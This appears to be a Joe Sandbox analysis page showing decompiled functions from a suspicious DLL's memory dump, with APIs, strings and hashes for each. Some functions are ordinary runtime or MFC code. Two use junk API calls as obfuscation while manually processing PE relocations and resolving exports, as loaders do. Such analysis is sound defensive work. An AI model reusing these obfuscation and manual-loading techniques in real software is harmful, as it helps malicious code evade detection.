Function 10026012 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109
libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E10026012(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x10048dc8 = GetProcAddress(_t37, "FlsAlloc");
					 *0x10048dcc = GetProcAddress(_t37, "FlsGetValue");
					 *0x10048dd0 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x10048dc8;
					_t40 = TlsSetValue;
					 *0x10048dd4 = _t7;
					if( *0x10048dc8 == 0) {
						L6:
						 *0x10048dcc = TlsGetValue;
						 *0x10048dc8 = E10025CC9;
						 *0x10048dd0 = _t40;
						 *0x10048dd4 = TlsFree;
					} else {
						__eflags =  *0x10048dcc;
						if( *0x10048dcc == 0) {
							goto L6;
						} else {
							__eflags =  *0x10048dd0;
							if( *0x10048dd0 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10045960 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x10048dcc);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E10020E51();
							 *0x10048dc8 = E10025BFA( *0x10048dc8);
							 *0x10048dcc = E10025BFA( *0x10048dcc);
							 *0x10048dd0 = E10025BFA( *0x10048dd0);
							 *0x10048dd4 = E10025BFA( *0x10048dd4);
							_t18 = E10023E72();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E10025CFC();
								goto L15;
							} else {
								_push(E10025E88);
								_t21 =  *((intOrPtr*)(E10025C66( *0x10048dc8)))();
								__eflags = _t21 - 0xffffffff;
								 *0x1004595c = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E1002695E(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x1004595c);
										__eflags =  *((intOrPtr*)(E10025C66( *0x10048dd0)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E10025D39(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E10025CFC();
					return 0;
				}
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,100207BA,?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 10026018
__mtterm.LIBCMT ref: 10026024

Part of subcall function 10025CFC: __decode_pointer.LIBCMT ref: 10025D0D
Part of subcall function 10025CFC: TlsFree.KERNEL32(00000022,10020856,?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 10025D27

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1002603A
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10026047
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10026054
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10026061
TlsAlloc.KERNEL32(?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 100260B1
TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 100260CC
__init_pointers.LIBCMT ref: 100260D6
__encode_pointer.LIBCMT ref: 100260E1
__encode_pointer.LIBCMT ref: 100260F1
__encode_pointer.LIBCMT ref: 10026101
__encode_pointer.LIBCMT ref: 10026111
__decode_pointer.LIBCMT ref: 10026132
__calloc_crt.LIBCMT ref: 1002614B
__decode_pointer.LIBCMT ref: 10026165
__initptd.LIBCMT ref: 10026174
GetCurrentThreadId.KERNEL32 ref: 1002617B

Strings

FlsGetValue, xrefs: 1002603C
FlsSetValue, xrefs: 10026049
FlsAlloc, xrefs: 10026034
KERNEL32.DLL, xrefs: 10026013
FlsFree, xrefs: 10026056

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 2657569430-3819984048
Opcode ID: 032371d8d2054dcfaa9331f682b7adc651e4b7ec3922b6df847e9872986f5f56
Instruction ID: 704b4601cb084f4dd452549cd158f7ffd0a67ac7cd9a7aed0fe10d7678a8cbb0
Opcode Fuzzy Hash: 032371d8d2054dcfaa9331f682b7adc651e4b7ec3922b6df847e9872986f5f56
Instruction Fuzzy Hash: 8631A435D02321AEF751EF74AD8490F3BE5EB56252B504926F401C72F2EB329940CF58

Uniqueness

Uniqueness Score: -1.00%

Function 1001E144 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001E144(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}

0x1001e151
0x1001e15a
0x1001e163
0x1001e16d
0x1001e177
0x1001e181
0x1001e18b
0x1001e195
0x1001e19f
0x1001e1a9
0x1001e1b3
0x1001e1bd
0x1001e1c2
0x1001e1c9

APIs

RegisterClipboardFormatA.USER32(Native), ref: 1001E153
RegisterClipboardFormatA.USER32(OwnerLink), ref: 1001E15C
RegisterClipboardFormatA.USER32(ObjectLink), ref: 1001E166
RegisterClipboardFormatA.USER32(Embedded Object), ref: 1001E170
RegisterClipboardFormatA.USER32(Embed Source), ref: 1001E17A
RegisterClipboardFormatA.USER32(Link Source), ref: 1001E184
RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1001E18E
RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1001E198
RegisterClipboardFormatA.USER32(FileName), ref: 1001E1A2
RegisterClipboardFormatA.USER32(FileNameW), ref: 1001E1AC
RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1001E1B6
RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1001E1C0

Strings

FileName, xrefs: 1001E19A
ObjectLink, xrefs: 1001E15E
OwnerLink, xrefs: 1001E155
Embedded Object, xrefs: 1001E168
RichEdit Text and Objects, xrefs: 1001E1B8
Link Source Descriptor, xrefs: 1001E190
Native, xrefs: 1001E14C
Rich Text Format, xrefs: 1001E1AE
Object Descriptor, xrefs: 1001E186
Embed Source, xrefs: 1001E172
FileNameW, xrefs: 1001E1A4
Link Source, xrefs: 1001E17C

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ClipboardFormatRegister
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1228543026-2889995556
Opcode ID: 0e86c2709f0b9af3b7d061cab64bc5c46ce0e33a6718d2d0bc984e8fe3a0ba64
Instruction ID: 4b9fafc3805f733a061432fadfe8ab03a294f1ea68a7cded52070413de5cc64b
Opcode Fuzzy Hash: 0e86c2709f0b9af3b7d061cab64bc5c46ce0e33a6718d2d0bc984e8fe3a0ba64
Instruction Fuzzy Hash: 600144708007949ECB32EFB69C08C8BBAE5EED57117024D6EE2858F610E778E641CF84

Uniqueness

Uniqueness Score: -1.00%

Function 1000290C Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 251
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000290C(signed int _a4, intOrPtr _a8) {
				intOrPtr _v4;
				unsigned int _v8;
				signed int _v12;
				intOrPtr _v16;
				int _v20;
				signed short* _v24;
				int _t73;
				intOrPtr* _t80;
				short* _t132;
				short* _t156;

				_t156 = L"xadqsavcbdfewescGADW";
				_t132 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v16 =  *((intOrPtr*)(_a4 + 4));
				_v20 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d4;
				_v20 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440dc + _v20;
				_t73 =  *_a4 + 0xa0 + (GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d0 + _v20) * 8;
				_v20 = _t73;
				if( *((intOrPtr*)(_t73 + 4)) != 0) {
					_a4 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) << 3;
					_t80 = (GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) + _a4) *  *0x100440d0 +  *_v20 + _v16;
					while(1) {
						_a4 = _t80;
						if( *_t80 <= 0) {
							break;
						}
						_v4 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d0 +  *_a4 + _v16;
						_v20 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 + 8;
						_v24 = _v20 + GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d4 * 2 + _a4;
						_v20 = 0;
						_v12 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_a4 + 4)) - 8 >> 1;
						if(GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 + _v12 == 0) {
							L7:
							_t80 = _a4 + GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_a4 + 4));
							continue;
						} else {
							goto L4;
						}
						do {
							L4:
							_v12 = ( *_v24 & 0x0000ffff) >> GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d0 + 0xc;
							_v8 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d8 + 0x00000fff &  *_v24 & 0x0000ffff;
							if(_v12 == 3) {
								_v12 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d8 << 2;
								_v8 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d4 + _v12 + _v8 + _v4;
								 *_v8 =  *_v8 + GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d0 + _a8;
							}
							_v20 = _v20 + 1;
							GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9);
							_v24 =  &(_v24[1]);
							_v8 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_a4 + 4)) - 8 >> 1;
						} while (_v20 < GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 + _v8);
						goto L7;
					}
					return 1;
				}
				return 0 | _a8 == 0x00000000;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 1000293F
GetCurrencyFormatW.KERNEL32 ref: 10002958
GetCurrencyFormatW.KERNEL32 ref: 10002975
GetCurrencyFormatW.KERNEL32 ref: 100029B2
GetCurrencyFormatW.KERNEL32 ref: 100029C7

Strings

xadqsavcbdfewescGADW, xrefs: 10002925, 1000292A, 1000294D, 1000296A, 100029AD, 100029B9, 100029E8, 10002A07, 10002A20, 10002A47, 10002A6B, 10002A94, 10002AB2, 10002AE9, 10002AFE, 10002B22, 10002B4F, 10002B62, 10002B7E, 10002BAB
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10002917, 1000292D, 10002932, 10002950, 1000296D, 100029AF, 100029BC, 100029EB, 10002A0A, 10002A23, 10002A4F, 10002A6E, 10002A97, 10002AB8, 10002AEC, 10002B01, 10002B29, 10002B52, 10002B65, 10002B81, 10002BAE

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 53cc18772c5c51637f45663d1903c786bbf5cef672ca4e34036eb6a9dd3be76e
Instruction ID: 79824c52bf8429aa3b3288a891149b50f2ccf3fe83c12eb32a247a59d7a1ec18
Opcode Fuzzy Hash: 53cc18772c5c51637f45663d1903c786bbf5cef672ca4e34036eb6a9dd3be76e
Instruction Fuzzy Hash: 19815971A44315BFE214DBA1CD86F1BBBECEB8AB48F01081EF7409A2D1D671A9108F65

Uniqueness

Uniqueness Score: -1.00%

Function 1000C177 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1000C177(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t106;
				long* _t108;
				long _t110;
				signed int _t111;
				CHAR* _t112;
				intOrPtr _t113;
				void* _t116;
				void* _t119;
				intOrPtr _t120;

				_t119 = __eflags;
				_t105 = __edi;
				_push(0x148);
				E1001FC2D(E10033686, __ebx, __edi, __esi);
				_t110 =  *(_t116 + 0x10);
				_t94 =  *(_t116 + 0xc);
				_push(0x10004e88);
				 *(_t116 - 0x120) = _t110;
				_t54 = E10010A4A(_t94, 0x10048490, __edi, _t110, _t119);
				_t120 = _t54;
				_t97 = 0 | _t120 == 0x00000000;
				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
				_t121 = _t120 == 0;
				if(_t120 == 0) {
					_t54 = E10004E6E(_t94, _t97, __edi, _t110, _t121);
				}
				if( *(_t116 + 8) == 3) {
					_t106 =  *_t110;
					_t111 =  *(_t54 + 0x14);
					_t55 = E1000EC09(_t94, _t106, _t111, __eflags);
					__eflags = _t111;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t116 - 0x124) = _t56;
					if(_t111 != 0) {
						L7:
						__eflags =  *0x1004886c;
						if( *0x1004886c == 0) {
							L12:
							__eflags = _t111;
							if(__eflags == 0) {
								__eflags =  *0x1004846c;
								if( *0x1004846c != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x1004846c; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t116 - 0x14) = _t59;
										if(_t59 != 0) {
											_t112 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t112);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t112,  *(_t116 - 0x14));
												_t66 = GetPropA(_t94, _t112);
												__eflags = _t66 -  *(_t116 - 0x14);
												if(_t66 ==  *(_t116 - 0x14)) {
													GlobalAddAtomA(_t112);
													SetWindowLongA(_t94, 0xfffffffc, E1000C033);
												}
											}
										}
										L27:
										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
										__eflags =  *(_t116 - 0x124);
										_t110 = _t60;
										if( *(_t116 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t105 + 0x28));
											_t50 = _t105 + 0x28;
											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t113 = 0x30;
								E10020F40(_t106, _t116 - 0x154, 0, _t113);
								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
								_push(_t116 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E100093B7(_t94, _t97, _t106, "#32768", __eflags);
								__eflags = _t72;
								 *0x1004846c = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t116 - 0x19)) = 0;
									_t76 = E1002290B(_t116 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E1000EC55(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
							E1000A931(_t111, _t116, _t94);
							 *((intOrPtr*)( *_t111 + 0x50))();
							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1000B02E);
							__eflags = _t83 - E1000B02E;
							if(_t83 != E1000B02E) {
								 *_t108 = _t83;
							}
							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
							__eflags =  *(_t116 - 0x14);
							if( *(_t116 - 0x14) != 0) {
								_push( *(_t116 - 0x18));
								_push(0);
								E1000E519();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t106 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t116 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
							_t87 = _t116 - 0x18;
						}
						_t88 = E10005CC1(_t87, "ime");
						__eflags = _t88;
						_pop(_t97);
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t106 + 0x20) & 0x40000000;
					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
					L30:
					return E1001FCB0(_t94, _t105, _t110);
				}
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 1000C181

Part of subcall function 10010A4A: __EH_prolog3.LIBCMT ref: 10010A51

CallNextHookEx.USER32 ref: 1000C1C5

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

GetClassLongA.USER32 ref: 1000C209
GlobalGetAtomNameA.KERNEL32 ref: 1000C233
SetWindowLongA.USER32 ref: 1000C288
_memset.LIBCMT ref: 1000C2D2
GetClassLongA.USER32 ref: 1000C302
GetClassNameA.USER32(?,?,00000100), ref: 1000C323
GetWindowLongA.USER32 ref: 1000C347
GetPropA.USER32 ref: 1000C361
SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1000C36C
GetPropA.USER32 ref: 1000C374
GlobalAddAtomA.KERNEL32 ref: 1000C37C
SetWindowLongA.USER32 ref: 1000C38A
CallNextHookEx.USER32 ref: 1000C3A2
UnhookWindowsHookEx.USER32(?), ref: 1000C3B6

Strings

#32768, xrefs: 1000C2E4, 1000C2E9, 1000C333
ime, xrefs: 1000C23C
AfxOldWndProc423, xrefs: 1000C35A, 1000C35F, 1000C36A, 1000C372, 1000C37B

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423$ime
API String ID: 1191297049-4034971020
Opcode ID: fa5ef0e6d9e371cfd272aca91c122599bb0de00c0ced2b86db92b24c7c9bf750
Instruction ID: 7666ce8964d8ee3f6bc6ffcfd40649ad75606c78465d6ba84a3d7def91f03792
Opcode Fuzzy Hash: fa5ef0e6d9e371cfd272aca91c122599bb0de00c0ced2b86db92b24c7c9bf750
Instruction Fuzzy Hash: F461B17190036AAFEB15DB60CC49F9E7BB8EF083D1F114154F509A6196DB34AE81CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10001688 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 204
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E10001688(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v4;
				signed int _v8;
				intOrPtr _v12;
				int _v16;
				intOrPtr _v20;
				void* _t113;
				short* _t126;
				short* _t142;

				_t142 = L"xadqsavcbdfewescGADW";
				_t126 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v20 = (GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d0 << 6) + _a4;
				_v16 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) * 0xf8;
				_v16 = (GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) + _v16) *  *0x100440d0 +  *((intOrPtr*)(_v20 + 0x3c)) + _a4;
				_v16 = _v16 + 0x78 + GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d8 * 8;
				_v20 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d4 * 0x28 +  *_v16 + _a4;
				_v16 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440cc;
				_v12 =  *((intOrPtr*)(_v20 + 0x20)) + GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d0 * 4 + _v16 + _a4;
				_v16 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440cc << 2;
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v20 + 0x1c)) + _v16 + _a4;
				_v16 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440e0 + GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440e0;
				_v8 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v20 + 0x24)) + _v16 + _a4;
				_v16 = 0;
				if(GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_v20 + 0x18)) == 0) {
					L3:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t113 = E100014CF( *((intOrPtr*)(_v12 + (GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440dc + _v16) * 4)) + _a4);
					_push(0x22b9);
					_push(_t142);
					_push(0);
					_push(_t126);
					_push(0x11d4);
					_push(0);
					if(_t113 == _a8) {
						break;
					}
					_v16 = _v16 + 1;
					if(_v16 < GetCurrencyFormatW(??, ??, ??, ??, ??, ??) *  *0x100440dc +  *((intOrPtr*)(_v20 + 0x18))) {
						continue;
					}
					goto L3;
				}
				_v8 =  *(_v8 + (GetCurrencyFormatW() *  *0x100440d4 + _v16) * 2) & 0x0000ffff;
				return  *((intOrPtr*)(_v4 + (GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440e0 + _v8) * 4)) + _a4;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 100016B0
GetCurrencyFormatW.KERNEL32 ref: 100016D0
GetCurrencyFormatW.KERNEL32 ref: 100016E8
GetCurrencyFormatW.KERNEL32 ref: 10001710
GetCurrencyFormatW.KERNEL32 ref: 10001731
GetCurrencyFormatW.KERNEL32 ref: 10001757
GetCurrencyFormatW.KERNEL32 ref: 10001770
GetCurrencyFormatW.KERNEL32 ref: 1000179B
GetCurrencyFormatW.KERNEL32 ref: 100017B7
GetCurrencyFormatW.KERNEL32 ref: 100017DF
GetCurrencyFormatW.KERNEL32 ref: 100017FA
GetCurrencyFormatW.KERNEL32 ref: 10001826
